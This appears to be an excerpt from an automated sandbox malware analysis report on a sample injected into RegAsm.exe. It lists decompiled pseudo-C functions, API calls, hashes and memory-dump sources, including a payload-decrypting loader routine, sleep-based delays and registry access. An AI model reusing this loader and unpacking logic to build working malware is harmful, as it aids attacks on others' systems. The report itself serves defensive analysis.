Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: AllocateCloseEnumHeapObjectOpenSingleWait
String ID:
API String ID: 3664505660-0
Opcode ID: a61de9022097517c4492a934870406fd30b43a6422e62b6c1cc6fc74c33ab232
Instruction ID: 05dc691f913b4145f4a316cf96bfce10800e370dd6c5399bf8ca0a43178019cc
Opcode Fuzzy Hash: a61de9022097517c4492a934870406fd30b43a6422e62b6c1cc6fc74c33ab232
Instruction Fuzzy Hash: 0B312871D40119EACF22AFE9DC48CEFFFB9EB98350F904166E691B2151D2760A80DB90

Uniqueness

Uniqueness Score: -1.00%

Function 010A419E, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 010A41F5
SysAllocString.OLEAUT32(010A18CF), ref: 010A4238
SysFreeString.OLEAUT32(00000000), ref: 010A424C
SysFreeString.OLEAUT32(00000000), ref: 010A425A

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 9964f8eabd10d1d64ea3efdeaf4f4cdf26dfae8991d4ac9aae4c883fe2ff7772
Instruction ID: 377555ef1b506138c13edf9819a4ec9b85fb98217dfc86dd3e33884e11808b9f
Opcode Fuzzy Hash: 9964f8eabd10d1d64ea3efdeaf4f4cdf26dfae8991d4ac9aae4c883fe2ff7772
Instruction Fuzzy Hash: E2313876900109EFCB05CFD8D4848EEBBB8FF48344B94802EE686D7250D7799A45CF61

Uniqueness

Uniqueness Score: -1.00%

Function 010A20B8, Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E010A20B8(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E010A1214(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E010A1CAF(_t23);
						}
					}
					return _t38;
				}
				_t26 = E010A1314(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x10aa2f8, 1, 0,  *0x10aa394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E010A5F2C(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E010A1821(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E010A3175(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E010A268C( &_v32, _t39);
					goto L13;
				}
			}

0x010a20b8
0x010a20c5
0x010a20cb
0x010a20cc
0x010a20cd
0x010a20ce
0x010a20cf
0x010a20d3
0x010a20da
0x010a20df
0x010a20e3
0x010a216b
0x010a216b
0x010a216e
0x010a2170
0x010a2178
0x010a217e
0x010a2181
0x010a2181
0x010a217e
0x010a218c
0x010a218c
0x010a20ef
0x010a20f6
0x010a20f8
0x010a20f8
0x010a210f
0x010a2113
0x010a2116
0x010a2121
0x010a2128
0x010a2128
0x010a2134
0x010a2135
0x010a2143
0x010a2137
0x010a2137
0x010a2138
0x010a2139
0x010a213a
0x010a213b
0x010a213c
0x010a213c
0x010a2148
0x010a214d
0x010a214f
0x010a2151
0x010a2151
0x010a2158
0x00000000
0x010a215a
0x010a215a
0x010a2167
0x00000000
0x010a2167

APIs

CreateEventA.KERNEL32(010AA2F8,00000001,00000000,00000040,?,?,74E5F710,00000000,74E5F730,?,?,?,?,010A675D,?,00000001), ref: 010A2109
SetEvent.KERNEL32(00000000,?,?,?,?,010A675D,?,00000001,?,00000002,?,?,?), ref: 010A2116
Sleep.KERNELBASE(00000BB8,?,?,?,?,010A675D,?,00000001,?,00000002,?,?,?), ref: 010A2121
CloseHandle.KERNEL32(00000000,?,?,?,?,010A675D,?,00000001,?,00000002,?,?,?), ref: 010A2128

Part of subcall function 010A5F2C: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,010A2148,?), ref: 010A5F52
Part of subcall function 010A5F2C: RegEnumKeyExA.KERNELBASE(?,?,?,010A2148,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,010A2148), ref: 010A5F99
Part of subcall function 010A5F2C: WaitForSingleObject.KERNEL32(00000000,?,?,?,010A2148,?,010A2148,?,?,?,?,?,010A2148,?), ref: 010A6006
Part of subcall function 010A5F2C: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,010A2148,?,?,?,?,?,010A675D,?), ref: 010A602E

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
String ID:
API String ID: 891522397-0
Opcode ID: 71ee9a392fac0c2cbffe065bf59c3c440b1379252eb523847bf4c806b1ec063a
Instruction ID: 1cd02c280a25de175dd233c755e7a1e53ae9ea46ecbe09d3d4163eefbd12f456
Opcode Fuzzy Hash: 71ee9a392fac0c2cbffe065bf59c3c440b1379252eb523847bf4c806b1ec063a
Instruction Fuzzy Hash: 69219277D0011ABBDF21AFE88884CEEB7BEAB54250FC14175FB91A7140D735A941CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A63A2, Relevance: 6.1, APIs: 4, Instructions: 80
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010A63A2(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E010A4573(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E010A2625(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E010A24CD(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}

0x010a63ae
0x010a63d1
0x010a63db
0x010a63e1
0x010a63e5
0x010a63fd
0x010a6402
0x010a644a
0x010a6404
0x010a640c
0x010a6410
0x010a6447
0x010a6412
0x010a6424
0x010a6428
0x010a643e
0x010a642a
0x010a642d
0x010a642f
0x010a6434
0x010a6439
0x010a6439
0x010a6434
0x010a6428
0x010a6410
0x010a6452
0x010a6452
0x010a6459
0x010a645f
0x010a645f
0x010a63c7
0x010a63cb
0x00000000
0x00000000
0x00000000

APIs

RegOpenKeyW.ADVAPI32(80000002,03409DC4,03409DC4), ref: 010A63DB
RegQueryValueExW.KERNELBASE(03409DC4,?,00000000,80000002,00000000,00000000,?,010A1900,3D010A90,80000002,010A2148,00000000,010A2148,?,03409DC4,80000002), ref: 010A63FD
RegQueryValueExW.ADVAPI32(03409DC4,?,00000000,80000002,00000000,00000000,00000000,?,010A1900,3D010A90,80000002,010A2148,00000000,010A2148,?,03409DC4), ref: 010A6422
RegCloseKey.ADVAPI32(03409DC4,?,010A1900,3D010A90,80000002,010A2148,00000000,010A2148,?,03409DC4,80000002,00000000,?), ref: 010A6452

Part of subcall function 010A24CD: SafeArrayDestroy.OLEAUT32(00000000), ref: 010A2552

Part of subcall function 010A2625: RtlFreeHeap.NTDLL(00000000,00000000,010A5AE0,00000000,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A2631

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
String ID:
API String ID: 486277218-0
Opcode ID: 9b4d593144967ee5f09668f1a6f7f2dd1151962f977d75624e2f93c2b0004ad3
Instruction ID: 28d7ef663e9e49edca8baead0aa281fe54f4d06ac44d3973c165ee58491b1f9f
Opcode Fuzzy Hash: 9b4d593144967ee5f09668f1a6f7f2dd1151962f977d75624e2f93c2b0004ad3
Instruction Fuzzy Hash: 4A21307250011EFFDF519E94DC84CEE7BBAFB08250B448465FE5597110DB329D60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F017FB, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(03F14958,?,00000000,03F14958,00000000,03F14968,03F14958,?,?,?,?,03F15CA4,80000001,?,03F14958,03F14968), ref: 03F01820
RtlAllocateHeap.NTDLL(00000000,03F14968,00000000), ref: 03F01837
HeapFree.KERNEL32(00000000,00000000,?,03F15CA4,80000001,?,03F14958,03F14968,?,03F0D25C,80000001,?,03F14958), ref: 03F01852
RegQueryValueExA.KERNELBASE(03F14958,?,00000000,03F14958,00000000,03F14968,?,03F15CA4,80000001,?,03F14958,03F14968,?,03F0D25C,80000001), ref: 03F01871

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 8391bd6defd869c285ee9c3b67a80d582ba9a056043dca43d87c3b997b5d76bb
Instruction ID: ae478de1013fa5a6dbb8132ef4b00d6a5e942718aef60ab2fa11b95c18988d85
Opcode Fuzzy Hash: 8391bd6defd869c285ee9c3b67a80d582ba9a056043dca43d87c3b997b5d76bb
Instruction Fuzzy Hash: 04111CBA90011CFFDF22DF99DD84CEEBBBDEB89750B104066F901A6250D2715E50EB60

Uniqueness

Uniqueness Score: -1.00%

Function 010A11AB, Relevance: 6.0, APIs: 4, Instructions: 43
sleepthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E010A11AB(intOrPtr _a4) {
				struct _FILETIME _v16;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t22;
				void* _t28;
				signed int _t30;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v16);
					_t22 = _v16.dwHighDateTime;
					_t16 = (_t22 << 0x00000020 | _v16.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t22 >> 5);
					_push(_t16);
					L010A806A();
					_t30 = _t16 + _t13;
					_t18 = E010A59F2(_a4, _t30);
					_t28 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t30 & 0x00000007)); // executed
				} while (_t28 == 1);
				return _t28;
			}

0x010a11b1
0x010a11bc
0x010a11bd
0x010a11bd
0x010a11c9
0x010a11d2
0x010a11d5
0x010a11d9
0x010a11db
0x010a11e0
0x010a11e1
0x010a11e2
0x010a11ec
0x010a11ef
0x010a11f6
0x010a11fa
0x010a1201
0x010a1207
0x010a1211

APIs

SwitchToThread.KERNEL32(?,00000000), ref: 010A11BD
GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000000), ref: 010A11C9
_aullrem.NTDLL(00000000,?,00000013,00000000), ref: 010A11E2

Part of subcall function 010A59F2: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,010A11F4,00000000), ref: 010A5A51

Sleep.KERNELBASE(00000003,00000000,?,00000000), ref: 010A1201

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
String ID:
API String ID: 1610602887-0
Opcode ID: a9ad54fe819af2aaafca3b79c38e35b59f6b263e6c66d84f09ba259d72e4d520
Instruction ID: d6e8b7012b6998994cf8d60b0e76515fc0799d4b78cd1f24701b11af5738df8d
Opcode Fuzzy Hash: a9ad54fe819af2aaafca3b79c38e35b59f6b263e6c66d84f09ba259d72e4d520
Instruction Fuzzy Hash: D9F0AF77F401147BDB10A7A8DC1DFDE77F8EB84355F414125F602E7240EAB89A088BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F21206, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,03F2C140,00000000,03F01964,?,03F0E707,?), ref: 03F21225
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,03F2C140,00000000,03F01964,?,03F0E707,?), ref: 03F21230
_wcsupr.NTDLL ref: 03F2123D
lstrlenW.KERNEL32(00000000), ref: 03F21245

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: 7a4da75e3fcdcf6c7ede004b9a83373afce3a3b6d5dbdd75a202e78d5083cd78
Instruction ID: 003729827fada33e438466086723bb11bbbcd28b287469f0d490891dd8391cd6
Opcode Fuzzy Hash: 7a4da75e3fcdcf6c7ede004b9a83373afce3a3b6d5dbdd75a202e78d5083cd78
Instruction Fuzzy Hash: EAF05936605265EFD322FA356C98E7FBA6CEF80A60B140038F901D60C4CF54CC0141A0

Uniqueness

Uniqueness Score: -1.00%

Function 03F226D2, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON

Download Yara Rule

APIs

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F226F1

Part of subcall function 03F11DA2: RtlEnterCriticalSection.NTDLL(00000000), ref: 03F11DAE
Part of subcall function 03F11DA2: CloseHandle.KERNEL32(?), ref: 03F11DBC
Part of subcall function 03F11DA2: RtlLeaveCriticalSection.NTDLL(00000000), ref: 03F11DD8

CloseHandle.KERNEL32(?), ref: 03F226FF
InterlockedDecrement.KERNEL32(03F2BFFC), ref: 03F2270E

Part of subcall function 03F1AC11: SetEvent.KERNEL32(000003C4,03F22729), ref: 03F1AC1B
Part of subcall function 03F1AC11: CloseHandle.KERNEL32(000003C4), ref: 03F1AC30
Part of subcall function 03F1AC11: HeapDestroy.KERNELBASE(03FB0000), ref: 03F1AC40

RtlExitUserThread.NTDLL(00000000), ref: 03F2272A

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
String ID:
API String ID: 1141245775-0
Opcode ID: 2ce314fe28e17167e240436ea7b598f827d023adc66947eb38e6bf8d1d2af068
Instruction ID: bc2e92ebbc59a9de80f3afbb7d63aed3402365f810024e3f976de0939433eb6f
Opcode Fuzzy Hash: 2ce314fe28e17167e240436ea7b598f827d023adc66947eb38e6bf8d1d2af068
Instruction Fuzzy Hash: D0F04F35900628FFD721EB699C4AF6E3F78EB46730B100258F525D72D0DBB499018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F05DA4, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F05DCA
memcpy.NTDLL ref: 03F05DF2

Part of subcall function 03F0317C: NtAllocateVirtualMemory.NTDLL(03F04884,00000000,00000000,03F04884,00003000,00000040), ref: 03F031AD
Part of subcall function 03F0317C: RtlNtStatusToDosError.NTDLL(00000000), ref: 03F031B4
Part of subcall function 03F0317C: SetLastError.KERNEL32(00000000), ref: 03F031BB

GetLastError.KERNEL32(00000010,00000218,03F2503D,00000100,?,00000318,00000008), ref: 03F05E09
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,03F2503D,00000100), ref: 03F05EEC

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
String ID:
API String ID: 685050087-0
Opcode ID: 9651361f70554c9ee6f2ba75f4887f873739c571595c112f44ba0f1cdaa53890
Instruction ID: edd58ffdd26d75028fac155adfca7f081098b21444cb84878a75dcff01688f6c
Opcode Fuzzy Hash: 9651361f70554c9ee6f2ba75f4887f873739c571595c112f44ba0f1cdaa53890
Instruction Fuzzy Hash: 8A4192B5504301EFD720DF68DC41B9BBBE9AB88350F00892DF598C6290E774D5249FA6

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 106
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void* _v20;
				unsigned int _v24;
				intOrPtr _v28;
				char _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v52;
				signed int _v56;
				intOrPtr _t52;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t70;
				signed int _t79;
				intOrPtr* _t84;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t91;
				intOrPtr _t93;
				intOrPtr _t94;
				intOrPtr _t96;

				_t93 =  *0x404170;
				_t52 = E00401A62(_t93,  &_v32,  &_v24);
				_v28 = _t52;
				if(_t52 == 0) {
					asm("sbb ebx, ebx");
					_t79 =  ~( ~(_v24 & 0x00000fff)) + (_v24 >> 0xc);
					_t94 = _t93 + _v32;
					_v44 = _t94;
					_t59 = VirtualAlloc(0, _t79 << 0xc, 0x3000, 4); // executed
					_v36 = _t59;
					if(_t59 == 0) {
						_v28 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t79 <= 0) {
							_t60 =  *0x404180;
						} else {
							_t87 = _a4;
							_v12 = _t94;
							_v12 = _v12 - _t59;
							_t16 = _t87 + 0x405137; // 0x405137
							_t88 = _t59 - _t94 + _t16;
							_v20 = _t59;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_v16 = 0x400;
								_t96 = 0;
								_t84 = _v20;
								_v40 = (_v56 ^ _v52) - _v8 + _v32 + _a4 - 1;
								do {
									_t70 =  *((intOrPtr*)(_v12 + _t84));
									_t91 = _t70;
									if(_t70 == 0) {
										_v16 = 1;
									} else {
										 *_t84 = _t70 + _t96 - _v40;
										_t96 = _t91;
										_t84 = _t84 + 4;
									}
									_t33 =  &_v16;
									 *_t33 = _v16 - 1;
								} while ( *_t33 != 0);
								_t35 = _t88 + 0xc; // 0x666f736f
								_t36 = _t88 + 8; // 0x7263694d
								_v20 = _v20 + 0x1000;
								_t39 = _t88 + 4; // 0x20303230
								_t60 =  *_t35 -  *_t36 +  *_t39;
								_v8 = _v8 + 1;
								 *0x404180 = _t60;
							} while (_v8 < _t79);
						}
						if(_t60 != 0x69b25f44) {
							_v28 = 9;
						} else {
							E00402081(_v24, _v36, _v44);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v28;
			}

0x00401007
0x00401017
0x0040101e
0x00401021
0x00401036
0x0040103d
0x00401042
0x00401053
0x00401056
0x0040105e
0x00401061
0x00401133
0x00401067
0x00401067
0x0040106d
0x004010fe
0x00401073
0x00401073
0x0040107a
0x0040107d
0x00401080
0x00401080
0x00401087
0x0040108b
0x00401096
0x00401097
0x00401098
0x0040109f
0x004010ac
0x004010b2
0x004010b5
0x004010b8
0x004010bb
0x004010c0
0x004010c2
0x004010d2
0x004010c4
0x004010c9
0x004010cb
0x004010cd
0x004010cd
0x004010d9
0x004010d9
0x004010d9
0x004010de
0x004010e1
0x004010e4
0x004010eb
0x004010eb
0x004010ee
0x004010f4
0x004010f4
0x004010fb
0x00401108
0x0040111a
0x0040110a
0x00401113
0x00401113
0x0040112b
0x0040112b
0x0040113a
0x00401140

APIs

VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,00000030,?,00000000,00000000,?,?,?,?,?,?,?,0040148D), ref: 00401056
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 0040112B

Strings

Dec 13 2021, xrefs: 0040108E

Memory Dump Source

Source File: 00000008.00000002.521792829.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.521817363.0000000000405000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.521835908.0000000000407000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Similarity

API ID: Virtual$AllocFree
String ID: Dec 13 2021
API String ID: 2087232378-698138258
Opcode ID: 3f48bc893591a30ff86f9213642abc766f6a1c47cb57cb83ff9aee94f031d263
Instruction ID: 0ff931d7e985a5089ded21cd3789a51be88c3f817ac15e0fd11ce81d2e3d8927
Opcode Fuzzy Hash: 3f48bc893591a30ff86f9213642abc766f6a1c47cb57cb83ff9aee94f031d263
Instruction Fuzzy Hash: 80412F71E002199FDB10CF98D985BAEBBB8FF08314F10416AE945FB291D375AE45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 010A221C, Relevance: 4.6, APIs: 3, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E010A221C(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t64;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t62 = __esi + 0x2c;
				_v16 = 0;
				 *_t62 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t62);
				_t63 = __imp__; // 0x6fa0fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t63() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E010A4573(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t63() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t64 = E010A4573(_v8 + 1);
							if(_t64 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t64, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t64;
							}
						}
						E010A2625(_v20);
					}
					goto L12;
				}
			}

0x010a2222
0x010a222b
0x010a222e
0x010a2231
0x010a2233
0x010a2236
0x010a2317
0x010a231d
0x010a231d
0x010a2240
0x010a2247
0x010a224f
0x010a230e
0x010a2314
0x00000000
0x010a2314
0x010a2258
0x010a225c
0x010a225d
0x010a225e
0x010a2264
0x010a2265
0x010a226a
0x010a2271
0x00000000
0x010a2277
0x010a2286
0x010a2289
0x010a228c
0x010a2295
0x010a229c
0x010a229f
0x010a2305
0x010a22a1
0x010a22a4
0x010a22a8
0x010a22a9
0x010a22aa
0x010a22ab
0x010a22ad
0x010a22b4
0x010a22f8
0x010a22b6
0x010a22b6
0x010a22bf
0x010a22cd
0x010a22d1
0x010a22e9
0x010a22d3
0x010a22dc
0x010a22e4
0x010a22e4
0x010a22d1
0x010a22fe
0x010a22fe
0x00000000
0x010a229f

APIs

GetLastError.KERNEL32 ref: 010A230E

Part of subcall function 010A4573: RtlAllocateHeap.NTDLL(00000000,00000000,010A5A3F), ref: 010A457F

wcstombs.NTDLL ref: 010A22DC
GetLastError.KERNEL32 ref: 010A22F2

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: ErrorLast$AllocateHeapwcstombs
String ID:
API String ID: 2631933831-0
Opcode ID: f9f6cbbbf2a03cbf737f7d653d939061ff4c724b3a050a6083fc1b8cdda03c90
Instruction ID: 2fc37dc7d42b11ccaa499df012bd513dea826e1ed7368e6c975bf5993c099f6a
Opcode Fuzzy Hash: f9f6cbbbf2a03cbf737f7d653d939061ff4c724b3a050a6083fc1b8cdda03c90
Instruction Fuzzy Hash: B8311CB6900609FFDB20DFE5C880DAEBBB8FF18244F904569E582E3250D7319A44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F05B50, Relevance: 4.6, APIs: 3, Instructions: 81registryCOMMON

Download Yara Rule

APIs

Part of subcall function 03F08E53: RegCreateKeyA.ADVAPI32(80000001,043AA7F0,?), ref: 03F08E68
Part of subcall function 03F08E53: lstrlen.KERNEL32(043AA7F0,00000000,00000000,00000000,?,03F0B86A,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?,03F1BD19), ref: 03F08E91

RegQueryValueExA.KERNELBASE(03F21CFE,00000000,00000000,?,03F2B06C,?,00000001,03F21CFE,00000001,00000000,74E04D40,?,?,?,00000000,03F21CFE), ref: 03F05BA4
RegSetValueExA.KERNELBASE(03F21CFE,00000000,00000000,00000003,03F2B06C,00000028,?,?,?,00000000,03F21CFE), ref: 03F05BE3
RegCloseKey.ADVAPI32(03F21CFE,?,?,?,00000000,03F21CFE,?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F05BEF

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Value$CloseCreateQuerylstrlen
String ID:
API String ID: 2552977122-0
